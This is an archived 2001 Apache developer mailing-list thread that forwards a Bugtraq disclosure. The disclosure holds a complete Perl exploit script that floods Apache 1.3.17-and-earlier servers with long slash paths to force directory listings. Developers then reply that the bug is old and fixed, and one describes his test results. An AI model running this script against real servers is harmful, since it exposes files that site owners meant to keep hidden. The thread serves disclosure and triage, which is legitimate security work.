You are viewing a plain text version of this content. The canonical link for it is here.
Posted to dev@httpd.apache.org by Brian Behlendorf <br...@collab.net> on 2001/06/13 23:53:28 UTC
Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory
Listing Exploit (fwd)
---------- Forwarded message ----------
Date: Wed, 13 Jun 2001 02:44:35 -0500
From: Matt Watchinski <ma...@farm9.com>
To: bugtraq@securityfocus.com
Subject: Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory
Listing Exploit
#!/usr/bin/perl
#
# farm9, Inc. (copyright 2001)
#
# Name: Apache Artificially Long Slash Path Directory Listing Exploit
# Author: Matt Watchinski
# Ref: SecurityFocus BID 2503
#
# Affects: Apache 1.3.17 and below
# Tested on: Apache 1.3.12 running on Debian 2.2
#
# Info: This exploit tricks apache into returning a Index of the a
directory
# even if an index.html file is present. May not work on some OS's
#
# Details: http_request.c has a subroutine called ap_sub_req_lookup_file
that in
# very specific cases would feed stat() a filename that was longer
than
# stat() could handle. This would result in a condition where stat()
# would return 0 and a directory index would be returned instead of
the
# default index.html.
#
# Code Fragment: /src/main/http_request.c
# if (strchr(new_file, '/') == NULL) {
# char *udir = ap_make_dirstr_parent(rnew->pool, r->uri);
#
# rnew->uri = ap_make_full_path(rnew->pool, udir, new_file);
# rnew->filename = ap_make_full_path(rnew->pool, fdir, new_file);
# ap_parse_uri(rnew, rnew->uri); /* fill in parsed_uri values
*/
# if (stat(rnew->filename, &rnew->finfo) < 0) { <-- Important
part
# rnew->finfo.st_mode = 0;
# }
#
# Conditions: Mod_dir / Mod_autoindex / Mod_negotiation need to be
enabled
# The directory must also have the following Options enabled:
# Indexes and MultiView
# Some OS's have different conditions on the number of character
# you have to pass to stat to make this work. If stat doesn't
# return 0 for path names less than 8192 or so internal apache
# buffer checks will stop this exploit from working.
#
# Debian needed around 4060 /'s to make this work.
#
# Greets: Special thanks to natasha who added a lot of debug to apache
for me
# while i was trying to figure out what had to be enabled to make this
# exploit work. Also thanks to rfp for pointing out that MultiView
# needed to be enabled.
#
# More Greets: Jeff for not shooting me :) <All your Cisco's belong to
us>
# Anne for being so sexy <I never though corporate
espionage
# would be so fun>
# All my homies at farm9
# DJ Charles / DJ NoloN for the phat beats
# Marty (go go gadget snort)
# All my ex-bees
# RnVjazpIaXZlcndvcmxk
#
# I think that wraps it up. Have fun.
#
# Usage: ./apacheIndex.pl <host> <port> <HI> <Low>
# Where: Hi and low are the range for the number of / to try
#
use IO::Socket;
$low = $ARGV[3]; #Low number of slash characters to try
$hi = $ARGV[2]; #High number of slash characters to try
$port = $ARGV[1]; #Port to try to connect to
$host = $ARGV[0]; #Host to try to connect to
# Main loop. Not much to this exploit once you figure out what needed
to
# be enabled. Need to do some more testing on sub-dirs to see if it
# works with them. It should. Also different OS's might use a differnt
number
# of /. Send me the numbers if you don't mind matt@farm9.com
while($low <= $hi)
{
$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port,
Proto => "TCP") or die "Connect Failed";
$url = "";
$buffer = "";
$end = "";
$url = "GET ";
$buffer = "/" x $low . " HTTP/1.0\r\n";
$end = "\r\n\r\n";
$url = $url . $buffer . $end;
print $socket "$url";
while(<$socket>)
{
if($_ =~ "Index of")
{
print "Found the magic number: $low\n";
print "Now go do it by hand to to see it all\n";
close($socket);
exit;
}
}
close($socket);
$low++
}
Re: (DUH) Bugtraq ID 2503 : Apache Artificially Long Slash Path
DirectoryListing Exploit (fwd)
Posted by Jerry Baker <je...@weirdness.com>.
Jerry Baker wrote:
>
> I tried it with up to 300 "/"'s on Win2k without success.
>
> --
> Jerry Baker
Would help if I had read that it took 4000+. Heh. Still no success on
Win2k Advanced Server up to 5000.
--
Jerry Baker
"The only normal people are the ones you don't know very well." - Joe
Ancis
PGP Key:
http://keyserver.pgp.com:80/pks/lookup?op=get&exact=off&search=0xD4B2493F
LAME Binaries: http://jerbaker.dhs.org/lame
Re: Bugtraq ID 2503 : Apache Artificially Long Slash Path
DirectoryListing Exploit (fwd)
Posted by Marc Slemko <ma...@znep.com>.
this is an old bug that was fixed a while ago. no news here. just some
kiddie who thinks that writing a 5 line perl script is an "exploit" and
that providing context about the fact that the hole is old news is
unnecessary.
On Wed, 13 Jun 2001, Jerry Baker wrote:
> I tried it with up to 300 "/"'s on Win2k without success.
>
> --
> Jerry Baker
>
> "The only normal people are the ones you don't know very well." - Joe
> Ancis
>
> PGP Key:
> http://keyserver.pgp.com:80/pks/lookup?op=get&exact=off&search=0xD4B2493F
> LAME Binaries: http://jerbaker.dhs.org/lame
>
Re: Bugtraq ID 2503 : Apache Artificially Long Slash Path
DirectoryListing Exploit (fwd)
Posted by Jerry Baker <je...@weirdness.com>.
I tried it with up to 300 "/"'s on Win2k without success.
--
Jerry Baker
"The only normal people are the ones you don't know very well." - Joe
Ancis
PGP Key:
http://keyserver.pgp.com:80/pks/lookup?op=get&exact=off&search=0xD4B2493F
LAME Binaries: http://jerbaker.dhs.org/lame
Re: Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory Listing Exploit (fwd)
Posted by "William A. Rowe, Jr." <ad...@rowe-clan.net>.
> Date: Wed, 13 Jun 2001 02:44:35 -0500
> From: Matt Watchinski <ma...@farm9.com>
> To: bugtraq@securityfocus.com
> Subject: Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory
> Listing Exploit
>
> #!/usr/bin/perl
> #
> # farm9, Inc. (copyright 2001)
> #
> # Name: Apache Artificially Long Slash Path Directory Listing Exploit
> # Author: Matt Watchinski
> # Ref: SecurityFocus BID 2503
> #
> # Affects: Apache 1.3.17 and below
> # Tested on: Apache 1.3.12 running on Debian 2.2
As Mark points out, this is no longer an issue, and on Win32, it wasn't tripped
until you get to about 8180 characters. On pre-1.3.14, you needed a special character
in the path to trip it on Win32. Any which way, we are at 1.3.20 with no reoccurance
on any platform, for any reason.
The patch I've been hacking to 2.0's directory walk+path info code already handles
the 'error condition' v.s. the 'not found' condition properly. Feel free to try
proving me wrong once it's committed.
Bill